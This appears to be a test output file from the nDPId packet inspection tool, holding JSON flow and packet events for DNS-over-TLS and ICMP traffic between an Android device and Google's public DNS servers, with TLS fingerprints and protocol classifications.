00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1592552824856,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1592552824856,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA0g5MAAHcG7dkICAgIwKgBnwNV2jAOPHBKaWPSFIARAUT4OAAAAQEIChWqbQn\/\/5Cw"}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592552825913,"flow_last_seen":1592552825913,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1592552825913,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48044,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1592552825913,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592552825913,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA8tGBAAEAGuAjAqAGfCAgEBLusA1UTsXihAAAAAKAC\/\/9hlgAAAgQFtAQCCAr\/\/8zBAAAAAAEDAwg="}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592552825913,"flow_last_seen":1592552825913,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1592552825913,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","src_port":56024,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1592552825913,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592552825913,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA8yAFAAEAGoGPAqAGfCAgICNrYA1WXsATAAAAAAKAC\/\/8uSAAAAgQFtAQCCAr\/\/8zBAAAAAAEDAwg="}
00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1592552825926,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592552825926,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA8q2cAAHcGygEICAQEwKgBnwNVu6wOvAEKE7F4oqAS6yBkegAAAgQFZAQCCAp\/X4MU\/\/\/MwQEDAwg="}
00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1592552825927,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592552825927,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA8xdcAAHYGrI0ICAgIwKgBnwNV2tjD\/e2fl7AEwaAS6yBjdQAAAgQFZAQCCApkDcpF\/\/\/MwQEDAwg="}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1592552825928,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1592552825928,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA0tGFAAEAGuA\/AqAGfCAgEBLusA1UTsXiiDrwBC4AQAVd8vQAAAQEICv\/\/zMV\/X4MU"}
00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592552825913,"flow_last_seen":1592552825928,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1592552825928,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48044,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1592552825929,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1592552825929,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA0yAJAAEAGoGrAqAGfCAgICNrYA1WXsATBw\/3toIAQAVd7uAAAAQEICv\/\/zMVkDcpF"}
00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592552825913,"flow_last_seen":1592552825929,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1592552825929,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","src_port":56024,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
01017{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":15,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552825913,"flow_last_seen":1592552825957,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1572,"flow_avg_l4_payload_len":262,"midstream":0,"thread_ts_msec":1592552825957,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48044,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
01418{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1592552825913,"flow_last_seen":1592552825957,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":2990,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1592552825957,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48044,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","server_names":"dns.google,*.dns.google.com,8888.google,dns.google.com,dns64.dns.google,2001:4860:4860::64,2001:4860:4860::6464,2001:4860:4860::8844,2001:4860:4860::8888,8.8.4.4,8.8.8.8","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=dns.google","fingerprint":"5B:59:09:FC:7D:50:E6:F7:D1:08:8E:57:42:A2:D8:AE:1F:03:FF:EC"}}
01017{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552825913,"flow_last_seen":1592552825959,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1572,"flow_avg_l4_payload_len":262,"midstream":0,"thread_ts_msec":1592552825959,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","src_port":56024,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
01418{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":19,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1592552825913,"flow_last_seen":1592552825960,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":2990,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1592552825960,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","src_port":56024,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","server_names":"dns.google,*.dns.google.com,8888.google,dns.google.com,dns64.dns.google,2001:4860:4860::64,2001:4860:4860::6464,2001:4860:4860::8844,2001:4860:4860::8888,8.8.4.4,8.8.8.8","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=dns.google","fingerprint":"5B:59:09:FC:7D:50:E6:F7:D1:08:8E:57:42:A2:D8:AE:1F:03:FF:EC"}}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592552826036,"flow_last_seen":1592552826036,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1592552826036,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48048,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1592552826036,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592552826036,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA80uBAAEAGmYjAqAGfCAgEBLuwA1WtLB4AAAAAAKAC\/\/8imQAAAgQFtAQCCAr\/\/8zgAAAAAAEDAwg="}
00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1592552826049,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592552826049,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA8wHkAAHcGtO8ICAQEwKgBnwNVu7B94BEWrSweAaAS6yCziAAAAgQFZAQCCAq0eUC+\/\/\/M4AEDAwg="}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1592552826051,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1592552826051,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA00uFAAEAGmY\/AqAGfCAgEBLuwA1WtLB4BfeARF4AQAVfLywAAAQEICv\/\/zOS0eUC+"}
00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592552826036,"flow_last_seen":1592552826051,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1592552826051,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48048,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
01017{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":52,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552826036,"flow_last_seen":1592552826080,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1572,"flow_avg_l4_payload_len":262,"midstream":0,"thread_ts_msec":1592552826080,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48048,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
01418{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":53,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1592552826036,"flow_last_seen":1592552826081,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":2990,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1592552826081,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48048,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","server_names":"dns.google,*.dns.google.com,8888.google,dns.google.com,dns64.dns.google,2001:4860:4860::64,2001:4860:4860::6464,2001:4860:4860::8844,2001:4860:4860::8888,8.8.4.4,8.8.8.8","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=dns.google","fingerprint":"5B:59:09:FC:7D:50:E6:F7:D1:08:8E:57:42:A2:D8:AE:1F:03:FF:EC"}}
00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":81,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592552827426,"flow_last_seen":1592552827426,"flow_idle_time":120000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1592552827426,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3}
00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1592552827426,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1592552827426,"pkt":"EBMx8Tl2ag\/ahpuQCABFAABUl9BAAEAB0IHAqAGfCAgICAgA4JUAAgABem3sXgAAAADqxwcAAAAAABAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygpKissLS4vMDEyMzQ1Njc="}
00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":81,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592552827426,"flow_last_seen":1592552827426,"flow_idle_time":120000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1592552827426,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":5.297900}
00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1592552827440,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1592552827440,"pkt":"ag\/ahpuQEBMx8Tl2CABFoABUAAAAAHEBdrIICAgIwKgBnwAA6JUAAgABem3sXgAAAADqxwcAAAAAABAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygpKissLS4vMDEyMzQ1Njc="}
00522{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1592552828402,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1592552828402,"pkt":"EBMx8Tl2ag\/ahpuQCABFAABUl\/5AAEAB0FPAqAGfCAgICAgAgPEAAwABe23sXgAAAABJawcAAAAAABAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygpKissLS4vMDEyMzQ1Njc="}
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":157,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592552871852,"flow_last_seen":1592552871852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1592552871852,"l3_proto":"ip4","src_ip":"8.8.4.4","dst_ip":"192.168.1.159","src_port":853,"dst_port":47968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":157,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1592552871852,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1592552871852,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA0V5sAAHYGHtYICAQEwKgBnwNVu2A7uJADhSLfzIARAX\/+2gAAAQEICuSDFST\/\/78G"}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":158,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1592552871941,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1592552871941,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAAoAABAAEAGbH3AqAGfCAgEBLtgA1WFIt\/MAAAAAFAEAAC96AAA"}
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":159,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592552878549,"flow_last_seen":1592552878549,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1592552878549,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48098,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":159,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1592552878549,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592552878549,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA8PO5AAEAGL3vAqAGfCAgEBLviA1WhETzJAAAAAKAC\/\/\/ccgAAAgQFtAQCCAoAAAAnAAAAAAEDAwg="}
00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":160,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1592552878562,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592552878562,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA8nAYAAHYG2mIICAQEwKgBnwNVu+J3bBxFoRE8yqAS6yB6VAAAAgQFZAQCCAo7E6h3AAAAJwEDAwg="}
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":161,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1592552878563,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1592552878563,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA0PO9AAEAGL4LAqAGfCAgEBLviA1WhETzKd2wcRoAQAVeSlgAAAQEICgAAACw7E6h3"}
00962{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":162,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592552878549,"flow_last_seen":1592552878564,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1592552878564,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48098,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"b734f75d22aaff9866fbd5d27eef9106","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
01016{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":164,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552878549,"flow_last_seen":1592552878577,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":664,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1592552878577,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48098,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"b734f75d22aaff9866fbd5d27eef9106","ja3s":"1249fb68f48c0444718e4d3b48b27188","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":157,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592552871852,"flow_last_seen":1592552871852,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1592552871852,"l3_proto":"ip4","src_ip":"8.8.4.4","dst_ip":"192.168.1.159","src_port":853,"dst_port":47968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
